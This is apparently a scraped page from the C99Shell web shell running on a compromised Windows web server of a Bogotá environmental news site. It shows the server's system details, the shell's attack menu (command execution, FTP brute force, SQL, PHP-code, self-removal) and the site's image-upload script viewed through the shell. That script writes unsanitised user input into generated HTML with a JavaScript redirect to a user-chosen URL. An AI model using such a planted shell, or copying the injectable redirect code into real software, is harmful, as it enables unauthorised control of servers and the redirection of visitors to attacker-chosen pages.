!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\noticias\   drwxrwxrwx
Free 1.23 GB of 239.26 GB (0.51%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     procesar.php (3.23 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$target_dir 
"images/";                       
$target_file $target_dir basename($_FILES["fileToUpload"]["name"]);
$uploadOk 1;
$imageFileType strtolower(pathinfo($target_file,PATHINFO_EXTENSION));

// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
  
$check getimagesize($_FILES["fileToUpload"]["tmp_name"]);
  if(
$check !== false) {
   
// echo "File is an image - " . $check["mime"] . ".";
    
$uploadOk 1;
  } else {
    echo 
"ERROR - El archivo no es una imagen";
    
$uploadOk 0;
  }
}

// Check if file already exists
if (file_exists($target_file)) {
  echo 
"ERROR - Ya existe la imagen";
  
$uploadOk 0;
}

// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
  echo 
"ERROR - , la imagen es mu pesada.";
  
$uploadOk 0;
}

// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
  echo 
"ERROR, solo se permiten archivos tipo JPG, JPEG, PNG & GIF .";
  
$uploadOk 0;
}

// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
  echo 
"ERROR, NO SE PUDO CARGAR LA IMAGEN, INTENTE SUBIR CON OTRO NOMBRE";
// if everything is ok, try to upload file
} else {
  if (
move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    
    
$titulo strip_tags($_POST['titulo']);
$descripcion strip_tags($_POST['descripcion']);
$urlimagen strip_tags("http://noticias.ambientebogota.gov.co/images/".htmlspecialcharsbasename$_FILES["fileToUpload"]["name"])));
$url strip_tags($_POST['url']);
$nombrearchivo strip_tags($_POST['nombrearchivo'].".html");
$contenido "<html><head>
<meta name='twitter:card' content='summary' />
<meta property='og:title' content='
$titulo' />
<meta property='og:description' content='
$descripcion' />
<meta property='og:image' content='
$urlimagen' />



</head>
<body>

<script> 
<!--
window.location.replace('
$url?fbclid=fwrertytjtbcvnv'); 
//-->
</script>

</body>

</html>"
;

file_put_contents($nombrearchivo$contenido);

echo 
"La url a compartir es:</br>";
echo 
"<textarea id='Texto' rows='5' cols='80'>http://noticias.ambientebogota.gov.co/$nombrearchivo</textarea>
<p><button id='botonCopiar'>Copiar a redes</button></p>
"
;
    
    
    
    
    
    
    
//    echo "La images ". htmlspecialchars( basename( $_FILES["fileToUpload"]["name"])). " ha sido cargada exitosamente.";
  
} else {
    echo 
"ERROR, NO SE PUDO CARGAR LA IMAGEN";
  }
}
?>
<?php
echo "
<script> 
botonCopiar.addEventListener('click', () => {
// el método select es utilizado para seleccionar el contenido de un campo de texto
Texto.select(); 

  /* una declaración try...catch que marca un bloque de instrucciones para intentar (try), y especifica una respuesta si se produce una excepción (catch). */
  try {
    // el método document.execCommand('copy') copia el texto seleccionado al portapapeles
    let exito = document.execCommand('copy');// devuelve true o false
    //let msg = exito ? '\351xito' : 'error';
    let msg = exito ? '\xe9xito' : 'error';
    console.log(msg);
  } catch (error) {
    let err = error;
    console.log('No fue posible copiar el texto seleccionado!');
  }
});
</script>"


?>   

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--